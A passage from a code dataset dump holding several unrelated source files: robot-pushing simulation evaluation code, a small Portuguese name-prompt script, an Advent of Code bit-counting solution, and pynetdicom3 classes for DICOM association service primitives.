get_config(self.sim.pushing_object_id, self.sim._p, self.sim.client_id)\n self.sim.last_obj_conf = self.sim.current_obj_conf\n self.sim.goal_obj_conf = self.sim.evaluation_sample['goal']\n arm_pose = self.sim.evaluation_sample['gripper']\n _, self.sim.current_depth_img, self.sim.current_true_depth = self.utils.get_image()\n self.sim.initial_true_depth = self.sim.current_true_depth\n self.sim.initial_image_processed = self.utils.process_initial_image(self.sim.current_depth_img, self.sim.current_obj_conf)\n target_joint_states = self.sim.get_ik_joints(arm_pose[0], euler_from_quat(arm_pose[1]),\n self.sim._robot_tool_center)[:6]\n self.sim._reset_arm_fixed(target_joint_states)\n\n def write_evaluation_RL(self, Done, reward):\n if Done:\n if self.sim.target_reached:\n self.success_list.append(True)\n else: self.success_list.append(False)\n self.reward_list.append(reward)\n self.run_length_list.append(self.sim.current_steps)\n self.sim.contact_frames.append(self.sim.has_contact)\n if self.sim.save_evaluations:\n os.makedirs(self.sim.evaluation_save_path, exist_ok=True)\n self.utils.save_np(np.asarray(self.success_list), 
self.sim.evaluation_save_path + \"success_list.npy\")\n self.utils.save_np(np.asarray(self.reward_list), self.sim.evaluation_save_path + \"reward_list.npy\")\n self.utils.save_np(np.asarray(self.run_length_list), self.sim.evaluation_save_path + \"run_length_list.npy\")\n self.utils.save_np(np.asarray(self.sim.contact_frames), self.sim.evaluation_save_path + \"contact_frames.npy\")\n\n def straight_pushing_eval_RL(self, Done, current_pose, last_pose, img):\n pos_distance = np.linalg.norm(last_pose - current_pose)\n self.current_path_length += pos_distance\n self.current_path.append([current_pose, last_pose])\n if Done:\n self.path_length_list.append(self.current_path_length)\n self.straight_pushing_picture_RL(img)\n self.current_path_length = 0\n self.current_path.clear()\n self.global_count+=1\n\n def straight_pushing_picture_RL(self, img):\n img = self.sim.initial_path_img.copy()\n black_pixels_mask = np.all(img == [0, 0, 0], axis=-1)\n img[black_pixels_mask] = [255, 255, 255]\n for p in self.current_path:\n p_1 = self.utils.get_pos_in_image(p[0])\n p_2 = self.utils.get_pos_in_image(p[1])\n img = cv2.line(img, (p_1[0], p_1[1]), (p_2[0], p_2[1]), [255,0,0], 2)\n cv2.imwrite(self.evaluation_save_path + \"path_img_\" + str(self.global_count) + \".png\", img)\n\n def write_evaluation_baseline(self, reached):\n if reached: self.success_list.append(True)\n else: self.success_list.append(False)\n if self.sim.save_evaluations:\n os.makedirs(self.sim.evaluation_save_path, exist_ok=True)\n self.utils.save_np(np.asarray(self.success_list), self.sim.evaluation_save_path + \"success_list.npy\")\n self.utils.save_np(np.asarray(self.current_path_length), self.sim.evaluation_save_path + \"real_path_length_list.npy\")\n self.utils.save_np(np.asarray(self.reward_list), self.sim.evaluation_save_path + \"reward_list.npy\")\n self.utils.save_np(np.asarray(self.run_length_list), self.sim.evaluation_save_path + \"run_length_list.npy\")\n self.utils.save_np(np.asarray(self.sim.contact_frames), self.sim.evaluation_save_path + \"contact_frames.npy\")\n\n\n def straight_pushing_eval_baseline(self, Done, current_pose, last_pose):\n pos_distance = np.linalg.norm(last_pose - current_pose)\n self.current_path_length += pos_distance\n self.current_path.append([current_pose, last_pose])\n if Done:\n self.path_length_list.append(self.current_path_length)\n # self.astar_deviation()\n self.straight_pushing_picture_baseline()\n self.current_path_length = 0\n self.current_path.clear()\n self.global_count+=1\n\n def astar_deviation(self, plot=False):\n #get trajectory in grid coords\n trajectory = []\n for points in self.current_path:\n point = self.temp((points[0] + points[1])/2)\n trajectory.append(point)\n trajectory = np.flip(np.array(trajectory, dtype=int), axis=1)\n\n #cut astar path when target is in reach\n goal = np.flip(self.temp(self.sim.goal_obj_conf[0]))\n distances = np.sqrt(np.square(goal[0] - self.sim.baseline.path[:, 0]) + np.square(goal[1] - self.sim.baseline.path[:, 1]))\n till = np.min(np.argwhere(distances < self.sim.baseline.target_reached_thres*256))\n path = self.sim.baseline.path[0:max(till, 1)]\n\n #connect edges\n edges = np.concatenate((trajectory, path))\n finish = np.transpose(np.array(line(path[-1, 0], path[-1, 1], trajectory[-1, 0], trajectory[-1, 1])))\n start = np.transpose(np.array(line(path[0, 0], path[0, 1], trajectory[0, 0], trajectory[0, 1])))\n edges = np.concatenate((edges, finish))\n edges = np.concatenate((start, edges))\n\n #fill space between edges\n fill = polygon(edges[:, 0], 
edges[:, 1])\n # num_fill = len(fill[0]) - len(np.unique(edges, axis=1))\n num_fill = len(fill[0])\n self.path_deviation = num_fill/(np.power(2., 16.)*np.power(10., -4.)) #in square centimeters\n print(\"number of cells: \", num_fill)\n print(\"space: {} cm^2\".format(self.path_deviation))\n\n #plot\n if plot:\n base = np.zeros((256, 256))\n base[fill] = 1\n plt.imsave(self.sim.evaluation_save_path + \"fill\"+ str(self.global_count) + \".png\", base)\n\n def theta_star_deviation(self, plot=False):\n path = self.sim.initial_shortest_path\n #get trajectory in grid coords\n trajectory = []\n for points in self.current_path:\n point = self.temp((points[0] + points[1])/2)\n trajectory.append(point)\n trajectory = np.flip(np.array(trajectory, dtype=int), axis=1) #???\n\n #connect edges\n edges = np.concatenate((trajectory, path))\n finish = np.transpose(np.array(line(path[-1, 0], path[-1, 1], trajectory[-1, 0], trajectory[-1, 1])))\n start = np.transpose(np.array(line(path[0, 0], path[0, 1], trajectory[0, 0], trajectory[0, 1])))\n edges = np.concatenate((edges, finish))\n edges = np.concatenate((start, edges))\n\n #fill space between edges\n fill = polygon(edges[:, 0], edges[:, 1])\n # num_fill = len(fill[0]) - len(np.unique(edges, axis=1))\n num_fill = len(fill[0])\n print(\"number of cells: \", num_fill)\n\n #plot\n if plot:\n base = np.zeros((256, 256))\n base[fill] = 1\n plt.imsave(self.sim.evaluation_save_path + \"fill\"+ str(self.global_count) + \".png\", base)\n\n def temp(self,coords):\n pos = np.asarray([0, 0], dtype=int)\n # pos[1] = int((coords[0] + 0.5) * 256 / 1) # int((coords[0] + 0.45)*255/0.9) #\n # pos[0] = int((coords[1] + 0.9) * 256 / 1) # int((coords[1] + 0.75)*127/0.45)#\n # pos[0] = int((coords[0] + 0.5)*(self.workspace_size[0] - 1)/1) #int((coords[0] + 0.45)*255/0.9) #\n pos[0] = int((coords[0] + 0.907/2)*(256 - 1)/0.907) #int((coords[0] + 0.45)*255/0.9) #\n # pos[1] = int((coords[1] + 0.9)*(self.workspace_size[1] - 1)/1) #int((coords[1] + 0.75)*127/0.45)#\n pos[1] = int((coords[1] + 0.903)*(256 - 1)/0.903) #int((coords[1] + 0.75)*127/0.45)#\n return pos\n\n def rev_temp(self, coords):\n pos = np.asarray([0,0], dtype=float)\n # pos[0] = (1/2)*(1.2/256) + coords[0]/256*1 - 0.5\n # pos[1] = (1/2)*(1/256) + coords[1]/256*1 - 0.9\n # pos[0] = (1/2)*(1.2/self.workspace_size[0]) + coords[0]/self.workspace_size[0]*1 - 0.5\n pos[0] = (1/2)*(1/256) + coords[0]/256*1 - 0.907/2\n # pos[1] = (1/2)*(1/self.workspace_size[1]) + coords[1]/self.workspace_size[1]*1 - 0.9\n pos[1] = (1/2)*(1/256) + coords[1]/256*1 - 0.903\n return pos\n\n def straight_pushing_picture_baseline(self):\n img = self.sim.baseline.initial_path_img.copy()\n for p in self.current_path:\n p_1 = self.temp(p[0])#self.utils.get_pos_in_image(np.append(p[0], [0.025]))\n p_2 = self.temp(p[1])#self.utils.get_pos_in_image(np.append(p[1], [0.025]))\n img = cv2.line(img, (p_2[0], p_2[1]), (p_1[0], p_1[1]), [255,0,255], 2)\n cv2.imwrite(self.sim.evaluation_save_path + \"path_img_\"+ str(self.global_count) + \".png\", img)\n\n","repo_name":"btabia/residual-pushing","sub_path":"push_gym/push_gym/evaluation/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36213041028","text":"import time\r\n\r\nnome = None\r\n\r\ndef bemVindo():\r\n global nome\r\n nome = input('Insira seu nome: ')\r\n\r\n confirm = input('Isso está correto? 
\"{}\" S/N >'.format(nome)).lower()\r\n\r\n if confirm == 's':\r\n nome = nome\r\n else:\r\n bemVindo()\r\n\r\nbemVindo()\r\n\r\ntime.sleep(1)\r\nprint('Bem vindo, ',nome)\r\n\r\n\r\n\r\n\r\n","repo_name":"S4Yuuki/Curso.py","sub_path":"Atividades/002.py","file_name":"002.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"74952360328","text":"import sys\n\n# read file\ndata = sys.stdin.readlines()\n\n# clean\nclean_data = [[int(i.strip()) for i in line.strip()] for line in data]\n\ndata = clean_data\n\n# process\ngamma, epsilon = [], []\nones, zeros = 0, 0\n\nfor i in range(len(data[0])):\n for j in data:\n if j[i] == 0:\n zeros += 1\n else:\n ones += 1\n\n if zeros > ones:\n gamma.append(\"0\")\n epsilon.append(\"1\")\n\n else:\n gamma.append(\"1\")\n epsilon.append(\"0\")\n\n zeros, ones = 0, 0\n\n\ngamma = int(\"\".join(gamma), base=2)\nepsilon = int(\"\".join(epsilon), base=2)\n\nprint(gamma * epsilon)\n","repo_name":"gotche/advent_of_code","sub_path":"03/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8213600371","text":"\"\"\"\nImplementaion of the service parameter primitives.\n\"\"\"\nimport codecs\nimport logging\n\nfrom pydicom.uid import UID\n\nfrom pynetdicom3.pdu import (MaximumLengthSubItem,\n ImplementationClassUIDSubItem,\n ImplementationVersionNameSubItem,\n AsynchronousOperationsWindowSubItem,\n SCP_SCU_RoleSelectionSubItem,\n SOPClassExtendedNegotiationSubItem,\n SOPClassCommonExtendedNegotiationSubItem,\n UserIdentitySubItemRQ,\n UserIdentitySubItemAC)\nfrom pynetdicom3.utils import validate_ae_title, PresentationContext\n#from pynetdicom3.utils import pretty_bytes\n\nLOGGER = logging.getLogger('pynetdicom3.pdu_primitives')\n\n\nclass ServiceParameter(object):\n \"\"\" Base class for Service Parameters \"\"\"\n\n def __eq__(self, other):\n \"\"\"Equality of two ServiceParameters\"\"\"\n if isinstance(other, self.__class__):\n return other.__dict__ == self.__dict__\n\n return False\n\n def __ne__(self, other):\n \"\"\"Inequality of two ServiceParameters\"\"\"\n return not self == other\n\n def from_primitive(self):\n \"\"\"FIXME\"\"\"\n raise NotImplementedError\n\n def FromParams(self):\n \"\"\"FIXME\"\"\"\n return self.from_primitive()\n\n\n# Association Service primitives\nclass A_ASSOCIATE(object):\n \"\"\"\n A-ASSOCIATE Parameters\n\n The establishment of an association between two AEs shall be performed\n through ACSE A-ASSOCIATE request, indication, response and confirmation\n primitives.\n\n The initiator of the service is called the Requestor and the user that\n receives the request is the Acceptor.\n\n See PS3.8 Section 7.1.1\n\n The A-ASSOCIATE primitive is used by the DUL provider to send/receive\n information about the association. 
It gets converted to \n A-ASSOCIATE-RQ, -AC, -RJ PDUs that are sent to the peer DUL provider and \n gets deconverted from -RQ, -AC, -RJ PDUs received from the peer.\n\n It may be better to simply extend this with methods for containing\n the -rq, -ac, -rj possibilities rather than creating a new\n AssociationInformation class, but it would require maintaining the instance\n across the request-accept/reject path\n\n -rq = no Result value\n -ac = Result of 0x00\n -rj = Result != 0x00\n\n ::\n\n Parameter Request Indication Response Confirmation\n app context name M M(=) M M(=)\n calling ae title M M(=) M M(=)\n called ae title M M(=) M M(=)\n user info M M(=) M M(=)\n result M M(=)\n source M\n diagnostic U C(=)\n calling pres add M M(=)\n called pres add M M(=)\n pres context list M M(=)\n pres list result M M(=)\n\n mode UF MF(=)\n resp ae title MF MF(=)\n resp pres add MF MF(=)\n pres and sess req UF UF(=) UF UF(=)\n\n U - User option\n UF - User option, fixed value\n C - Conditional (on user option)\n M - Mandatory\n MF - Mandatory, fixed value\n (=) - shall have same value as request or response\n\n\n The Requestor sends a request primitive to the local DICOM UL provider =>\n peer UL => indication primitive to Acceptor.\n\n Acceptor sends response primitive to peer UL => local UL => confirmation\n primitive to Requestor\n\n The DICOM UL providers communicate with UL users using service primitives\n The DICOM UL providers communicate with each other using PDUs over TCP/IP\n\n **Service Procedure**\n\n 1. An AE (DICOM UL service user) that desires the establish an association\n issues an A-ASSOCIATE request primitive to the DICOM UL service\n provider. The Requestor shall not issue any primitives except the\n A-ABORT request primitive until it receives an A-ASSOCIATE confirmation\n primitive.\n 2. The DICOM UL service provider issues an A-ASSOCIATE indication primitive\n to the called AE\n 3. The called AE shall accept or reject the association by sending an\n A-ASSOCIATE response primitive with an appropriate Result parameter. The\n DICOM UL service provider shall issue an A-ASSOCIATE confirmation\n primitive having the same Result parameter. The Result Source parameter\n shall be assigned \"UL service-user\"\n 4. If the Acceptor accepts the association, it is established and is\n available for use. DIMSE messages can now be exchanged.\n 5. If the Acceptor rejects the association, it shall not be established and\n is not available for use\n 6. If the DICOM UL service provider is not capable of supporting the\n requested association it shall return an A-ASSOCIATE confirmation\n primitive to the Requestor with an appropriate Result parameter\n (rejected). The Result Source parameter shall be assigned either\n UL service provider (ACSE) or UL service provider (Presentation).\n The indication primitive shall not be issued. The association shall not\n be established.\n 7. Either Requestor or Acceptor may disrupt the Service Procedure by issuing\n an A-ABORT request primitive. The remote AE receives an A-ABORT\n indication primitive. The association shall not be established\n\n Attributes\n ----------\n mode : str\n Fixed value of \"normal\"\n PS3.8 7.1.1.1, [UF, MF(=), -, -]\n application_context_name : pydicom.uid.UID, bytes or str\n The application context name proposed by the requestor. Acceptor returns\n either the same or a different name. Returned name specifies the\n application context used for the Association. See PS3.8 Annex A. 
The\n application context name shall be a valid UID or UID string and for\n version 3 of the DICOM Standard should be '1.2.840.10008.3.1.1.1'\n PS3.8 7.1.1.2, [M, M(=), M, M(=)]\n calling_ae_title : str or bytes\n Identifies the Requestor of the A-ASSOCIATE service. Must be a valid\n AE\n PS3.8 7.1.1.3, [M, M(=), M, M(=)]\n called_ae_title : str or bytes\n Identifies the intended Acceptor of the A-ASSOCIATE service. Must be a\n valid AE\n PS3.8 7.1.1.4, [M, M(=), M, M(=)]\n responding_ae_title : str or bytes\n Identifies the AE that contains the actual acceptor of the\n A-ASSOCIATE service. Shall always contain the same value as the\n Called AE Title of the A-ASSOCIATE indication\n PS3.8 7.1.1.5, [-, -, MF, MF(=)]\n user_information : list\n Used by Requestor and Acceptor to include AE user information. See\n PS3.8 Annex D and PS3.7 Annex D.3\n PS3.8 7.1.1.6, [M, M(=), M, M(=)]\n result : int\n Provided either by the Acceptor of the A-ASSOCIATE request, the UL\n service provider (ACSE related) or the UL service provider\n (Presentation related). Indicates the result of the A-ASSOCIATE\n service. Allowed values are:\n\n * 0: accepted\n * 1: rejected (permanent)\n * 2: rejected (transient)\n\n PS3.8 7.1.1.7, [-, -, M, M(=)]\n result_source : int\n Identifies the creating source of the Result and Diagnostic parameters\n Allowed values are:\n\n * 0: UL service-user\n * 1: UL service-provider (ACSE related function)\n * 2: UL service-provider (presentation related function)\n\n PS3.8 7.1.1.8, [-, -, -, M]\n diagnostic : int\n If the `result` parameter is 0 \"rejected (permanent)\" or 1 \"rejected\n (transient)\" then this supplies diagnostic information about the result.\n If `result_source` is 0 \"UL service-user\" then allowed values are:\n\n * 0: no reason given\n * 1: application context name not supported\n * 2: calling AE title not recognised\n * 3: called AE title not recognised\n\n If `result_source` is 1 \"UL service-provider (ACSE related function)\"\n then allowed values are:\n\n * 0: no reason given\n * 1: no common UL version\n\n If `result_source` is 2 \"UL service-provider (presentation related\n function)\" then allowed values are:\n\n * 0: no reason given\n * 1: temporary congestion\n * 2: local limit exceeded\n * 3: called presentation address unknown\n * 4: presentation protocol version not supported\n * 5: no presentation service access point available\n \n PS3.8 7.1.1.9, [-, -, U, C(=)]\n calling_presentation_address : str\n TCP/IP address of the Requestor\n PS3.8 7.1.1.10, [M, M(=), -, -]\n called_presentation_address : str\n TCP/IP address of the intended Acceptor\n PS3.8 7.1.1.11, [M, M(=), -, -]\n responding_presentation_address : str\n Shall always contain the same value as the Called Presentation Address\n PS3.8 7.1.1.12, [-, -, MF, MF(=)]\n presentation_context_definition_list : list\n List of one or more presentation contexts, with each item containing\n a presentation context ID, an Abstract Syntax and a list of one or\n more Transfer Syntax Names. 
Sent by the Requestor during\n request/indication\n PS3.8 7.1.1.13, [M, M(=), -, -]\n presentation_context_definition_results_list : list\n Used in response/confirmation to indicate acceptance or rejection of\n each presentation context definition.\n List of result values, with a one-to-one correspondence between each\n of the presentation contexts proposed in the Presentation Context\n Definition List parameter.\n The result values may be sent in any order and may be different than\n the order proposed.\n Only one Transfer Syntax per presentation context shall be agreed to\n PS3.8 7.1.1.14, [-, -, M, M(=)]\n presentation_requirements : str\n Fixed value of \"Presentation Kernel\"\n PS3.8 7.1.1.15, [UF, UF(=), UF, UF(=)]\n session_requirements : str\n Fixed value of \"\" (empty string)\n PS3.8 7.1.1.16, [UF, UF(=), UF, UF(=)]\n \"\"\"\n # pylint: disable=too-many-instance-attributes\n\n def __init__(self):\n self.application_context_name = None\n self.calling_ae_title = None\n self.called_ae_title = None\n self.user_information = []\n self.result = None\n self.result_source = None\n self.diagnostic = None\n self.calling_presentation_address = None\n self.called_presentation_address = None\n self.presentation_context_definition_list = []\n self.presentation_context_definition_results_list = []\n\n @property\n def mode(self):\n \"\"\"Return the Mode parameter.\"\"\"\n return \"normal\"\n\n @property\n def application_context_name(self):\n \"\"\"Return the Application Context Name parameter.\"\"\"\n return self._application_context_name\n\n @application_context_name.setter\n def application_context_name(self, value):\n \"\"\"Set the Application Context Name parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The value for the Application Context Name\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n raise TypeError(\"application_context_name must be a \"\n \"pydicom.uid.UID, str or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"application_context_name is an invalid UID\")\n raise ValueError(\"application_context_name is an invalid UID\")\n\n self._application_context_name = value\n\n @property\n def calling_ae_title(self):\n \"\"\"Return the Calling AE Title parameter.\"\"\"\n return self._calling_ae_title\n\n @calling_ae_title.setter\n def calling_ae_title(self, value):\n \"\"\"Set the Calling AE Title parameter.\n\n Parameters\n ----------\n value : str or bytes\n The Calling AE Title as a string or bytes object. Cannot be an empty\n string and will be truncated to 16 characters long\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, str):\n value = codecs.encode(value, 'utf-8')\n\n if value is not None:\n self._calling_ae_title = validate_ae_title(value)\n else:\n self._calling_ae_title = None\n\n @property\n def called_ae_title(self):\n \"\"\"Return the Called AE Title parameter.\"\"\"\n return self._called_ae_title\n\n @called_ae_title.setter\n def called_ae_title(self, value):\n \"\"\"Set the Called AE Title parameter.\n\n Parameters\n ----------\n value : str or bytes\n The Called AE Title as a string or bytes object. 
Cannot be an empty\n string and will be truncated to 16 characters long\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, str):\n value = codecs.encode(value, 'utf-8')\n\n if value is not None:\n self._called_ae_title = validate_ae_title(value)\n else:\n self._called_ae_title = None\n\n @property\n def responding_ae_title(self):\n \"\"\"Return the Responding AE Title parameter.\"\"\"\n return self.called_ae_title\n\n @property\n def user_information(self):\n \"\"\"Return the User Information parameter.\"\"\"\n return self._user_information\n\n @user_information.setter\n def user_information(self, value_list):\n \"\"\"Set the A-ASSOCIATE primitive's User Information parameter.\n\n Parameters\n ----------\n value_list : list of pynetdicom3 user information class objects\n A list of user information objects, must contain at least\n MaximumLengthNegotiation and ImplementationClassUIDNotification\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n valid_usr_info_items = []\n\n if isinstance(value_list, list):\n # Iterate through the items and check they're an acceptable class\n for item in value_list:\n if item.__class__.__name__ in \\\n [\"MaximumLengthNegotiation\",\n \"ImplementationClassUIDNotification\",\n \"ImplementationVersionNameNotification\",\n \"AsynchronousOperationsWindowNegotiation\",\n \"SCP_SCU_RoleSelectionNegotiation\",\n \"SOPClassExtendedNegotiation\",\n \"SOPClassCommonExtendedNegotiation\",\n \"UserIdentityNegotiation\"]:\n valid_usr_info_items.append(item)\n else:\n LOGGER.info(\"Attempted to set \"\n \"A_ASSOCIATE.user_information to a list \"\n \"which includes an unsupported item\")\n else:\n LOGGER.error(\"A_ASSOCIATE.user_information must be a list\")\n raise TypeError(\"A_ASSOCIATE.user_information must be a list\")\n\n self._user_information = valid_usr_info_items\n\n @property\n def result(self):\n \"\"\"Return te Result parameter.\"\"\"\n return self._result\n\n @result.setter\n def result(self, value):\n \"\"\"Set the A-ASSOCIATE Service primitive's Result parameter.\n\n Parameters\n ----------\n value : str\n One of the following:\n * 0: accepted\n * 1: rejected (permanent)\n * 2: rejected (transient)\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is None:\n pass\n elif value not in [0, 1, 2]:\n LOGGER.error(\"A_ASSOCIATE.result set to an unknown value\")\n raise ValueError(\"Unknown A_ASSOCIATE.result value\")\n\n self._result = value\n\n @property\n def result_source(self):\n \"\"\"Return the Result Source parameter.\"\"\"\n return self._result_source\n\n @result_source.setter\n def result_source(self, value):\n \"\"\"Set the A-ASSOCIATE Service primitive's Result Source parameter.\n\n Parameters\n ----------\n value : int\n One of the following:\n * 1: UL service-user\n * 2: UL service-provider (ACSE related function)\n * 3: UL service-provider (presentation related function)\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is None:\n pass\n elif value not in [1, 2, 3]:\n LOGGER.error(\"A_ASSOCIATE.result_source set to an unknown value\")\n raise ValueError(\"Unknown A_ASSOCIATE.result_source value\")\n\n self._result_source = value\n\n @property\n def diagnostic(self):\n \"\"\"Return the Diagnostic parameter.\"\"\"\n return self._diagnostic\n\n @diagnostic.setter\n def diagnostic(self, value):\n \"\"\"\n Set the A-ASSOCIATE Service primitive's Diagnostic parameter\n\n Parameters\n ----------\n value : int\n If `result_source` is \"UL service-user\" then allowed values 
are:\n * 1: no reason given\n * 2: application context name not supported\n * 3: calling AE title not recognised\n * 7: called AE title not recognised\n If `result_source` is \"UL service-provider (ACSE related function)\"\n then allowed values are:\n * 1: no reason given\n * 2: protocol version not supported\"\n If `result_source` is \"UL service-provider (Presentation related\n function)\" then allowed values are:\n * 1: temporary congestion\n * 2: local limit exceeded\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is None:\n pass\n elif value not in [1, 2, 3, 7]:\n LOGGER.error(\"A_ASSOCIATE.diagnostic set to an unknown value\")\n raise ValueError(\"Unknown A_ASSOCIATE.diagnostic value\")\n\n self._diagnostic = value\n\n @property\n def calling_presentation_address(self):\n \"\"\"Return the Calling Presentation Address parameter.\"\"\"\n return self._calling_presentation_address\n\n @calling_presentation_address.setter\n def calling_presentation_address(self, value):\n \"\"\"\n Set the A-ASSOCIATE Service primitive's Calling Presentation\n Address parameter\n\n Parameters\n ----------\n value : (str, int) tuple\n A tuple containing a valid TCP/IP address string and the port number\n as an int\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, tuple):\n if len(value) == 2 and isinstance(value[0], str) \\\n and isinstance(value[1], int):\n self._calling_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.calling_presentation_address must \"\n \"be (str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.calling_presentation_address \"\n \"must be (str, int) tuple\")\n elif value is None:\n self._calling_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.calling_presentation_address must be \"\n \"(str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.calling_presentation_address must \"\n \"be (str, int) tuple\")\n\n @property\n def called_presentation_address(self):\n \"\"\"Return the Called Presentation Address parameter.\"\"\"\n return self._called_presentation_address\n\n @called_presentation_address.setter\n def called_presentation_address(self, value):\n \"\"\"Set the Called Presentation Address parameter.\n\n Parameters\n ----------\n value : (str, int) tuple\n A tuple containing a valid TCP/IP address string and the port number\n as an int\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, tuple):\n if len(value) == 2 and isinstance(value[0], str) \\\n and isinstance(value[1], int):\n self._called_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.called_presentation_address must \"\n \"be (str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.called_presentation_address \"\n \"must be (str, int) tuple\")\n elif value is None:\n self._called_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.called_presentation_address must be \"\n \"(str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.called_presentation_address must \"\n \"be (str, int) tuple\")\n\n @property\n def responding_presentation_address(self):\n \"\"\"Get the Responding Presentation Address parameter.\"\"\"\n return self.called_presentation_address\n\n @property\n def presentation_context_definition_list(self):\n \"\"\"Get the Presentation Context Definition List.\"\"\"\n return self._presentation_context_definition_list\n\n @presentation_context_definition_list.setter\n def presentation_context_definition_list(self, value_list):\n \"\"\"\n Set the A-ASSOCIATE Service primitive's 
Presentation Context Definition\n List parameter\n\n Parameters\n ----------\n value_list : list of pynetdicom3.utils.PresentationContext\n The Presentation Contexts proposed by the Association Requestor\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value_list, list):\n valid_items = []\n for item in value_list:\n if isinstance(item, PresentationContext):\n valid_items.append(item)\n else:\n LOGGER.warning(\"Attempted to set \"\n \"A_ASSOCIATE.presentation_context_definition_list to \"\n \"a list which includes an invalid items\")\n\n self._presentation_context_definition_list = valid_items\n\n else:\n LOGGER.error(\"A_ASSOCIATE.presentation_context_definition_list \"\n \"must be a list\")\n raise TypeError(\"A_ASSOCIATE.presentation_context_definition_list \"\n \"must be a list\")\n\n @property\n def presentation_context_definition_results_list(self):\n \"\"\"Get the Presentation Context Definition Results List.\"\"\"\n return self._presentation_context_definition_results_list\n\n @presentation_context_definition_results_list.setter\n def presentation_context_definition_results_list(self, value_list):\n \"\"\"Set the Presentation Context Definition Results List parameter.\n\n Parameters\n ----------\n value_list : list of pynetdicom3.utils.PresentationContext\n The results of the Presentation Contexts proposal by the Association\n Requestor\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value_list, list):\n valid_items = []\n for item in value_list:\n if isinstance(item, PresentationContext):\n valid_items.append(item)\n else:\n LOGGER.warning(\"Attempted to set A_ASSOCIATE.presentation\"\n \"_context_definition_results_list to a \"\n \"list which includes one or more invalid \"\n \"items.\")\n\n self._presentation_context_definition_results_list = valid_items\n\n else:\n LOGGER.error(\"A_ASSOCIATE.presentation_context_definition_\"\n \"results_list must be a list\")\n raise TypeError(\"A_ASSOCIATE.presentation_context_definition_\"\n \"results_list must be a list\")\n\n @property\n def presentation_requirements(self):\n \"\"\"Get the Presentation Kernel.\"\"\"\n return \"Presentation Kernel\"\n\n @property\n def session_requirements(self):\n \"\"\"Get the Session Requirements.\"\"\"\n return \"\"\n\n # Shortcut attributes for User Information items\n # Mandatory UI Items\n @property\n def maximum_length_received(self):\n \"\"\"Get the Maximum Length Received.\"\"\"\n for item in self.user_information:\n if isinstance(item, MaximumLengthNegotiation):\n return item.maximum_length_received\n\n return None\n\n @maximum_length_received.setter\n def maximum_length_received(self, value):\n \"\"\"Set the Maximum Length Received.\n\n If the A_ASSOCIATE.user_information list contains a\n MaximumLengthNegotiated item then set its maximum_length_received value.\n If not then add a MaximumLengthNegotiated item and set its\n maximum_length_received value.\n\n Parameters\n ----------\n value : int\n The maximum length of each P-DATA in bytes\n \"\"\"\n # Type and value checking for the maximum_length_received parameter is\n # done by the MaximumLengthNegotiated class\n\n # Check for a MaximumLengthNegotiation item\n found_item = False\n\n for item in self.user_information:\n if isinstance(item, MaximumLengthNegotiation):\n found_item = True\n item.maximum_length_received = value\n\n # No MaximumLengthNegotiated item found\n if not found_item:\n max_length = MaximumLengthNegotiation()\n max_length.maximum_length_received = value\n 
self.user_information.append(max_length)\n\n @property\n def implementation_class_uid(self):\n \"\"\"Return the Implementation Class UID.\"\"\"\n for item in self.user_information:\n if isinstance(item, ImplementationClassUIDNotification):\n if item.implementation_class_uid is None:\n LOGGER.error(\"Implementation Class UID has not been set\")\n raise ValueError(\"Implementation Class UID has not \"\n \"been set\")\n\n return item.implementation_class_uid\n\n LOGGER.error(\"Implementation Class UID has not been set\")\n raise ValueError(\"Implementation Class UID has not been set\")\n\n @implementation_class_uid.setter\n def implementation_class_uid(self, value):\n \"\"\"Set the Implementation Class UID.\n\n If the A_ASSOCIATE.user_information list contains an\n ImplementationClassUIDNotification item then set its\n implementation_class_uid value. If not then add a\n ImplementationClassUIDNotification item and set its\n implementation_class_uid value.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The value for the Implementation Class UID\n \"\"\"\n # Type and value checking for the implementation_class_uid parameter is\n # done by the ImplementationClassUIDNotification class\n\n # Check for a ImplementationClassUIDNegotiation item\n found_item = False\n for item in self.user_information:\n if isinstance(item, ImplementationClassUIDNotification):\n found_item = True\n item.implementation_class_uid = value\n\n # No ImplementationClassUIDNegotiation item found\n if not found_item:\n imp_uid = ImplementationClassUIDNotification()\n imp_uid.implementation_class_uid = value\n self.user_information.append(imp_uid)\n\n\nclass A_RELEASE(object):\n \"\"\"\n A-RELEASE Parameters\n\n The release of an association between two AEs shall be performed through\n ACSE A-RELEASE request, indication, response and confirmation primitives.\n The initiator of the service is called a Requestor and the service-user that\n receives the A-RELEASE indication is called the acceptor.\n\n Service Procedure\n\n 1. The user (Requestor) that desires to end the association issues an\n A-RELEASE request primitive. The Requestor shall not issue any other\n primitives other than A-ABORT until it receives an A-RELEASE confirmation\n primitive.\n 2. The DUL 